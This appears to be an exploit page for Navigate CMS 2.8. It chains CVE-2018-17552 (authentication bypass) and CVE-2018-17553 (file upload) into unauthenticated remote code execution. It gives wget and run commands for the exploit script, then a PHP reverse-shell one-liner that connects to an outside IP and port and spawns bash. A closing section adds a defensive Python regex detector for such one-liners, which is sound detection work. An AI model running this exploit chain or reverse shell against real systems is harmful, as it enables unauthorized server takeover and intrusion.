This module exploits insufficient sanitization in the database::protect method of Navigate CMS versions 2.8
This script exploits:
- CVE-2018-17552 # Authentication bypass
- CVE-2018-17553 # File upload
wget https://raw.githubusercontent.com/0x4r2/Navigate-CMS-RCE-Unauthenticated-/main/navigate_RCE.sh
./navigate_RCE.sh navigator.hm
Getting a simple webshell. Enjoy!
php -r '$sock=fsockopen("192.168.153.133",9000);system("/bin/bash <&3 >&3 2>&3");'
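
For defenders, the one-liner above leaves a recognizable process command line: inline PHP (`-r`) that opens a socket with `fsockopen` and hands it to a shell through file-descriptor redirection. The following detection sketch is an added example, not part of the original script; the `(parent, cmdline)` event format, the list of web-server parent names, and every sample event except the payload copied from this page are assumptions constructed for illustration.

```python
import re

# Constructed process-creation records as (parent process, command line).
# Only the first command line is taken from this page; the rest are made up.
SAMPLE_EVENTS = [
    ("apache2", "php -r '$sock=fsockopen(\"192.168.153.133\",9000);system(\"/bin/bash <&3 >&3 2>&3\");'"),
    ("bash", "php -r 'echo PHP_VERSION;'"),
    ("php-fpm", "php /var/www/html/cron.php"),
    ("sshd", "php -r '$s=fsockopen(\"10.0.0.5\",25);fwrite($s,\"QUIT\");'"),
]

# php CLI invoked with inline code (-r), optionally after other flags.
INLINE_PHP = re.compile(r"\bphp\d*(?:\.\d+)?\s+(?:-\S+\s+)*-r\s")
# Outbound socket with a literal host and port.
SOCKET = re.compile(r"fsockopen\(\s*[\"']([^\"']+)[\"']\s*,\s*(\d+)")
# PHP functions that spawn an OS command.
SHELL_EXEC = re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
# Shell redirection onto a numbered descriptor, e.g. <&3 or >&3.
FD_REDIRECT = re.compile(r"[<>]&\d")
# Assumed names of web-server processes; adjust to the monitored hosts.
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}

def classify(parent, cmdline):
    """Return a finding dict for a socket-to-shell PHP one-liner, else None."""
    if not INLINE_PHP.search(cmdline):
        return None
    sock = SOCKET.search(cmdline)
    if not (sock and SHELL_EXEC.search(cmdline) and FD_REDIRECT.search(cmdline)):
        return None
    return {
        "remote": f"{sock.group(1)}:{sock.group(2)}",
        # A web-server parent means the command came through the web application.
        "severity": "critical" if parent in WEB_PARENTS else "high",
    }

def scan(events):
    """Classify every event and keep only the findings."""
    return [f for f in (classify(p, c) for p, c in events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Requiring all three signals together keeps benign inline PHP and ordinary socket clients, such as the constructed SMTP check, out of the results.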